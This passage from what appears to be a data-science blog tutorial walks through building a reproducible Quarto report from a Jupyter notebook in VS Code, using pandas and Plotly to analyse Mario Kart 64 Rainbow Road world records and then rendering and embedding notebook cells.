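&lt;p&gt;With the &amp;ldquo;venv&amp;rdquo; kernel selected, the interpreter path should point
inside your &amp;ldquo;venv&amp;rdquo; folder.&lt;/p&gt;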
&lt;h3 id="rendering-a-report"&gt;Rendering a report&lt;/h3&gt;
&lt;p&gt;We will generate a report about Mario Kart 64 world records. Please refer to
our &lt;a href="https://www.jumpingrivers.com/blog/quarto-for-python-users/" rel="external"&gt;previous post&lt;/a&gt;
for a recap of the YAML header, Markdown syntax and code chunk options (we will
only briefly cover these topics here).&lt;/p&gt;
&lt;h4 id="setting-up-jupyter"&gt;Setting up Jupyter&lt;/h4&gt;
&lt;p&gt;Within VS Code, create a Jupyter notebook by clicking &amp;ldquo;File&amp;rdquo; -&amp;gt; &amp;ldquo;New File&amp;hellip;&amp;rdquo;
-&amp;gt; &amp;ldquo;Jupyter Notebook (.ipynb support)&amp;rdquo;. Within the notebook, you can select the
kernel by clicking &amp;ldquo;Select Kernel&amp;rdquo; and choosing an option from the available
list (for example, your system Python installation or a virtual environment).
For this post, we used Python 3.10.&lt;/p&gt;
&lt;h4 id="header-settings"&gt;Header settings&lt;/h4&gt;
&lt;p&gt;The first code cell should be changed to a Raw NB Convert cell. In VS Code, the
cell type can be changed by clicking the text in the bottom-right corner of the
cell (this will read &amp;ldquo;Python&amp;rdquo; for a Python code cell). To select a raw cell,
type &amp;ldquo;raw&amp;rdquo; in the search bar and click the option that appears.&lt;/p&gt;
&lt;p&gt;The raw NB convert cell acts as the YAML header of the Quarto report. This is
where we include settings such as the title and default output format. Our
example is given below:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;---
title: &amp;#34;Reporting on Mario Kart 64 World Records&amp;#34;
author: &amp;#34;Parisa Gregg &amp;amp; Myles Mitchell&amp;#34;
date: &amp;#34;1 Aug 2023&amp;#34;
format: html
execute:
  eval: true
jupyter: python3
---
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;This sets the default output format to HTML and ensures that the code cells are
evaluated on execution. Remember to include the fencing (&lt;code&gt;---&lt;/code&gt;) for YAML
code.&lt;/p&gt;
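&lt;p&gt;It may help to see where this header lives inside the notebook file. An
&lt;code&gt;.ipynb&lt;/code&gt; file is JSON, and the raw cell is simply the first entry in
its list of cells. The sketch below builds a tiny notebook by hand with the
standard library to illustrate the layout; the helper &lt;code&gt;make_cell&lt;/code&gt; is
our own, the header is shortened, and in practice you would let VS Code or
&lt;code&gt;nbformat&lt;/code&gt; write the file for you:&lt;/p&gt;

```python
import json

# The YAML header, as it would be typed into the raw cell (shortened).
yaml_header = """---
title: "Reporting on Mario Kart 64 World Records"
format: html
execute:
  eval: true
jupyter: python3
---"""


def make_cell(cell_type, source):
    """Build one notebook cell as a plain dictionary (nbformat 4 layout)."""
    cell = {"cell_type": cell_type, "metadata": {}, "source": source}
    if cell_type == "code":
        # Code cells carry two extra fields in the notebook format.
        cell["execution_count"] = None
        cell["outputs"] = []
    return cell


notebook = {
    "cells": [
        make_cell("raw", yaml_header),           # the Quarto YAML header
        make_cell("markdown", "## Abstract"),    # narrative text
        make_cell("code", "import pandas as pd"),  # Python code
    ],
    "metadata": {},
    "nbformat": 4,
    "nbformat_minor": 4,
}

notebook_json = json.dumps(notebook, indent=1)
print([cell["cell_type"] for cell in notebook["cells"]])
```

&lt;p&gt;The point to take away is the ordering: the raw cell holding the YAML comes
first, followed by the Markdown and code cells that make up the report.&lt;/p&gt;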
&lt;h4 id="adding-text-and-code"&gt;Adding text and code&lt;/h4&gt;
&lt;p&gt;The remainder of the report will be built from a mixture of Markdown and Python
code cells:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Markdown cells are used for narrative text in the report.&lt;/li&gt;
&lt;li&gt;Python cells are used for displaying Python code and generating dynamic
content (e.g., figures, tables and inline results).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Try copying the following into a Markdown cell. This adds the Abstract,
Introduction and the beginning of the Methods section:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-md" data-lang="md"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;## Abstract
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Investigating how the world record for Rainbow Road in Mario Kart 64
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;developed over time.
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;## Introduction
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Mario Kart 64 is a racing video game developed and published by
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#7ee787"&gt;Nintendo&lt;/span&gt;](https://en.wikipedia.org/wiki/Nintendo) for the
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#7ee787"&gt;Nintendo 64&lt;/span&gt;](https://en.wikipedia.org/wiki/Nintendo_64).
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Players can choose from eight characters to race as, including:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;-&lt;/span&gt; Mario
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;-&lt;/span&gt; Toad
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;-&lt;/span&gt; Princess Peach
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;The game consists of 16 tracks to race around. World records can be
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;set for either one lap or a full race (three laps) of the course. As
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;players have competed for faster times, several track shortcuts have
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;been discovered. There are separate world records for both &lt;span style="font-style:italic"&gt;_with_&lt;/span&gt; and
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="font-style:italic"&gt;_without_&lt;/span&gt; the use of a shortcut.
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;## Methods
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;We loaded a dataset of [&lt;span style="color:#7ee787"&gt;Mario Kart 64&lt;/span&gt;](https://mkwrs.com/) world
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;records. This data is from [&lt;span style="color:#7ee787"&gt;tidytuesday&lt;/span&gt;](https://github.com/rfordatascience/tidytuesday/blob/master/data/2021/2021-05-25/readme.md)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;with credit to [&lt;span style="color:#7ee787"&gt;Benedikt Claus&lt;/span&gt;](https://github.com/benediktclaus).
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;For this investigation we are interested in the world records for
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Rainbow Road over a three-lap course. The dataset was loaded and
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;filtered using pandas:
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;By running the Markdown cell, the text will be rendered so it includes
subheadings, bullet points, italic text formatting and hyperlinks.&lt;/p&gt;
&lt;p&gt;Next we may wish to display the code used for loading and filtering the data.
Try copying this code into a Python cell:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pandas&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pd&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Load the records data&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;records &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;read_csv(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;https://raw.githubusercontent.com/rfordatascience/tidytuesday/master/data/2021/2021-05-25/records.csv&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Filter the data&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rainbow_road &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; records&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;loc[
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; (records[&lt;span style="color:#a5d6ff"&gt;&amp;#34;track&amp;#34;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Rainbow Road&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; (records[&lt;span style="color:#a5d6ff"&gt;&amp;#34;type&amp;#34;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Three Lap&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;]&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;reset_index()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# View the data&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rainbow_road&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;head()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Running this should produce the expected pandas output, including the first five
rows of the &lt;code&gt;rainbow_road&lt;/code&gt; data.&lt;/p&gt;
&lt;p&gt;Let&amp;rsquo;s now include some results, starting with a Markdown cell to add the
Results section header and opening text:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-md" data-lang="md"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;## Results
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;The figure below shows the development of world records for the Rainbow Road
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;track on Mario Kart 64 from 1997 to 2021.
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We &lt;em&gt;could&lt;/em&gt; insert the figure as a PNG or PDF image. But to make this report
reproducible, let&amp;rsquo;s dynamically generate the figure using a Python code cell:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#| echo: false&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#| fig-cap: &amp;#34;Progress of Rainbow Road world records, with and without allowing shortcuts.&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#| fig-width: 8&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#| label: wr-plot&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;plotly.express&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;px&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;px&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;line(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; rainbow_road,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; x&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;date&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;time&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; color&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;shortcut&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;Progress of Rainbow Road N64 World Records&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; line_shape&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;hv&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; markers&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;True&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The code chunk options at the top of this cell will make the code invisible in
the rendered document and set the figure caption, width, and label to
our liking. Plotly is used to visualise the world record for Rainbow Road over
time. Try running this code within your notebook to check that it generates a
figure like the one below:&lt;/p&gt;
&lt;p&gt;&lt;img alt="Image of the plot generated by the Plotly code above. The three-lap world record time is plotted against date from 1997 to 2021. Two coloured lines are shown: red for world records with a shortcut, and blue for without a shortcut." height="auto" id="h-rh-i-1" src="https://www.jumpingrivers.com/blog/reproducible-reports-jupyter-quarto-python/graphics/mk64_plot.png" width="1505"&gt;&lt;/p&gt;
&lt;p&gt;Finally, let&amp;rsquo;s use inline code to quote the longest time for which a world
record was held. Copy this code into a Python cell:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#| echo: false&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;IPython.display&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; display, Markdown
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;max_duration &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; rainbow_road&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;record_duration&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;max()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;display(Markdown(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;f&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;The longest a 3 lap world record was held
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;for on Rainbow Road is &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;{&lt;/span&gt;max_duration&lt;span style="color:#a5d6ff"&gt;}&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt; days
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;(&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;{&lt;/span&gt;round(max_duration&lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;365&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;)&lt;span style="color:#a5d6ff"&gt;}&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt; years).
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Running this should add the sentence &amp;ldquo;The longest a 3 lap world record was held
for on Rainbow Road is 2214 days (6.1 years).&amp;rdquo;, where the numbers 2214 and 6.1
have been calculated by Python. If more data is added, these numbers can be
updated automatically by re-rendering the notebook.&lt;/p&gt;
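&lt;p&gt;The arithmetic behind that sentence can be checked in isolation. The sketch
below reproduces the formatting step with the value 2214 hard-coded rather than
read from the data; the function name &lt;code&gt;duration_sentence&lt;/code&gt; is
hypothetical:&lt;/p&gt;

```python
def duration_sentence(max_duration_days):
    """Format the record duration in days and approximate years."""
    # 365 days per year is the same approximation used in the notebook cell.
    years = round(max_duration_days / 365, 1)
    return (
        "The longest a 3 lap world record was held for on Rainbow Road "
        f"is {max_duration_days} days ({years} years)."
    )


print(duration_sentence(2214))
```

&lt;p&gt;Since 2214 / 365 is roughly 6.07, rounding to one decimal place gives the 6.1
years quoted above.&lt;/p&gt;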
&lt;h4 id="rendering-your-notebook"&gt;Rendering your notebook&lt;/h4&gt;
&lt;p&gt;You should now have a complete notebook with a YAML header, Markdown text and
Python code cells. To see how it should look, you can view our notebook &lt;a href="https://github.com/jumpingrivers/blog/blob/main/blogs/2023-quarto-for-jupyter/rainbow_road.ipynb" rel="external"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;To render the report from the command line:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;quarto render &amp;lt;notebook&amp;gt;.ipynb --to html&lt;/code&gt; will render the document as HTML.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;quarto preview &amp;lt;notebook&amp;gt;.ipynb&lt;/code&gt; will generate a live preview which
can be viewed as you edit the notebook.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;quarto render &amp;lt;notebook&amp;gt;.ipynb --execute&lt;/code&gt; will execute the code cells as the
output is generated. Without this, you will need to ensure that you have run
the code cells in the notebook manually, &lt;em&gt;before&lt;/em&gt; quarto is used to render
it.&lt;/li&gt;
&lt;/ul&gt;
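&lt;p&gt;If you would rather drive these commands from a Python script (for example
as part of a scheduled job), one option is to call the Quarto CLI with
&lt;code&gt;subprocess&lt;/code&gt;. This is a minimal sketch, not an official Quarto API:
the function &lt;code&gt;quarto_render_command&lt;/code&gt; is our own, and it only uses the
&lt;code&gt;--to&lt;/code&gt; and &lt;code&gt;--execute&lt;/code&gt; flags shown above:&lt;/p&gt;

```python
import shutil
import subprocess
from pathlib import Path


def quarto_render_command(notebook, to="html", execute=True):
    """Build the argument list for rendering a notebook with Quarto."""
    command = ["quarto", "render", notebook, "--to", to]
    if execute:
        # Re-run the code cells while the output is generated.
        command.append("--execute")
    return command


notebook = "rainbow_road.ipynb"
command = quarto_render_command(notebook)
print(" ".join(command))

# Only attempt the render when Quarto is on the PATH and the notebook exists.
if shutil.which("quarto") is not None and Path(notebook).exists():
    subprocess.run(command, check=True)
```

&lt;p&gt;Passing the command as a list avoids shell quoting problems if the notebook
path contains spaces.&lt;/p&gt;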
&lt;p&gt;Upon rendering, an HTML document like the one
&lt;a href="https://jumpingrivers.github.io/blog/rainbow_road.html" rel="external"&gt;here&lt;/a&gt; should be
created.&lt;/p&gt;
&lt;p&gt;It&amp;rsquo;s also possible to render the notebook with the VS Code UI. Provided you
have the Quarto extension installed, there should be options to &amp;ldquo;Render&amp;rdquo;,
&amp;ldquo;Render All&amp;rdquo;, &amp;ldquo;Render HTML&amp;rdquo;, &amp;ldquo;Render PDF&amp;rdquo;, and &amp;ldquo;Render DOCX&amp;rdquo;:&lt;/p&gt;
&lt;p&gt;&lt;img alt="Screenshot displaying the render options in the VS Code UI. The options are accessed by clicking on the symbol with three dots found in the tool bar. The rendering options include “Render”, “Render All”, “Render DOCX”, “Render HTML” and “Render PDF”." height="auto" id="h-rh-i-2" src="https://www.jumpingrivers.com/blog/reproducible-reports-jupyter-quarto-python/graphics/render-options.png" width="978"&gt;&lt;/p&gt;
&lt;p&gt;Note that the HTML plot generated by Plotly cannot be displayed in a DOCX or
PDF document. Instead we would have to use a static image format like PNG or
PDF.&lt;/p&gt;
&lt;h3 id="cell-embedding"&gt;Cell embedding&lt;/h3&gt;
&lt;p&gt;In Quarto 1.3 a new feature was added that enables you to embed external
Jupyter notebook cells in a Quarto document. This is particularly useful if you
have results from different notebooks that you want to extract into a report.&lt;/p&gt;
&lt;p&gt;As well as investigating the world records set on Rainbow Road, we have also
been looking at those set on Choco Mountain. The results for Choco Mountain are
in a separate &lt;code&gt;choco_mountain.ipynb&lt;/code&gt; &lt;a href="https://github.com/jumpingrivers/blog/blob/main/blogs/2023-quarto-for-jupyter/choco_mountain.ipynb" rel="external"&gt;notebook&lt;/a&gt;.
We might now want to summarise
our various Mario Kart results in a single &lt;code&gt;.qmd&lt;/code&gt; report (see our
&lt;a href="https://www.jumpingrivers.com/blog/quarto-for-python-users/" rel="external"&gt;previous post&lt;/a&gt;
for a guide to &lt;code&gt;.qmd&lt;/code&gt; reports).&lt;/p&gt;
&lt;p&gt;Rather than having to replicate our plotting code, we can embed the relevant
cells from our &lt;code&gt;rainbow_road.ipynb&lt;/code&gt; and &lt;code&gt;choco_mountain.ipynb&lt;/code&gt; notebooks
directly into the &lt;code&gt;.qmd&lt;/code&gt; report:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-md" data-lang="md"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;---
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;title: &amp;#34;Reporting on Mario Kart 64 World Records&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;author: &amp;#34;Myles Mitchell &amp;amp; Parisa Gregg&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;date: &amp;#34;14 June 2023&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;format: html
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;---
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;## Rainbow Road
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;The figure below shows the development of world records for the
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Rainbow Road track on Mario Kart 64 from 1997 to 2021.
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;{{&amp;lt; embed rainbow_road.ipynb&lt;span style="color:#ffa657"&gt;#wr&lt;/span&gt;-plot &amp;gt;}}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;## Choco Mountain
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;The figure below shows the development of world records for the
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Choco Mountain track on Mario Kart 64 from 1997 to 2021.
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;{{&amp;lt; embed choco_mountain.ipynb&lt;span style="color:#ffa657"&gt;#wr&lt;/span&gt;-plot &amp;gt;}}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Here we have used the &amp;ldquo;wr-plot&amp;rdquo; label to reference the code cells that produce
the Plotly figures in the Rainbow Road and Choco Mountain reports. These code
cells are now embedded in the &lt;code&gt;.qmd&lt;/code&gt; report and the figures will be visible
